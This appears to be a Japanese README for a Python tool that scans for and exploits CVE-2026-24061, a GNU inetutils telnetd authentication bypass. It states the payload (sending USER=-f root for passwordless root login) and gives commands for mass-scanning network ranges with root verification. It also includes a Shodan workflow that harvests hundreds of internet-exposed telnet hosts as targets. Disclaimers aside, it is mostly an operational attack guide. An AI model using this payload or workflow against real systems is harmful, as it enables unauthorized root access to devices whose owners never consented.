
CVE-2026-24061 telnetd 認証バイパスをスキャンし、ペイロードを生成して、脆弱なGNU inetutils telnetdデバイス上でrootアクセスを検証します。
⚠️ 非常に重要な法的注意事項 ⚠️
このツールは教育目的、セキュリティ研究、脆弱性分析、および許可を得たテスト専用です。
USER=-f root(またはその亜種)を送信すると、パスワードなしで即座にrootとしてログインできます。このスキャナーは、Hakai Securityチームが公開した優れた技術分析と概念実証のおかげで実現しました。
彼らの詳細な記事は、悪用ベクトル、実際のペイロード、脆弱なtelnetdの動作に関する正確な技術的基盤を提供しました。
→ 完全な分析はこちらで読めます:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Hakai Securityに多大なる感謝を – 透明性、技術的品質、そしてセキュリティコミュニティへの貢献に感謝します。皆さんの協力により、このツールは責任ある研究のためのより正確で有用なものになりました。
--usersによるカスタマイズ可能なユーザーリスト(デフォルトにはroot、admin、pi、ubuntu、debianなどが含まれます)idおよびwhoamiによる実際のroot確認(--verify)-wで調整可能)# 推奨: virtualenvを使用
python3 -m venv venv-cve
source venv-cve/bin/activate
# 依存関係をインストール
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# ターゲットリスト付き(例: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# rootに焦点を当てる(より高速)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# ドライラン(IPリストのみ表示)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# APIキーで初期化
shodan init SUA_API_KEY_AQUI
# 可能性のあるターゲットをダウンロード
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# IPを抽出
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# スキャン
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
倫理的な焦点を維持し、責任に関する警告を強化する限り、プルリクエストは歓迎します。 ライセンス MITライセンス – ただし強調します: 不正使用はユーザー単独の責任です。 学習、啓発、セキュリティ研究のために作られました。
⭐ 役に立ったと思ったら、スターを付けてください!
🛡️ 細心の注意を払って使用してください。
Made with ❤️ by killsystema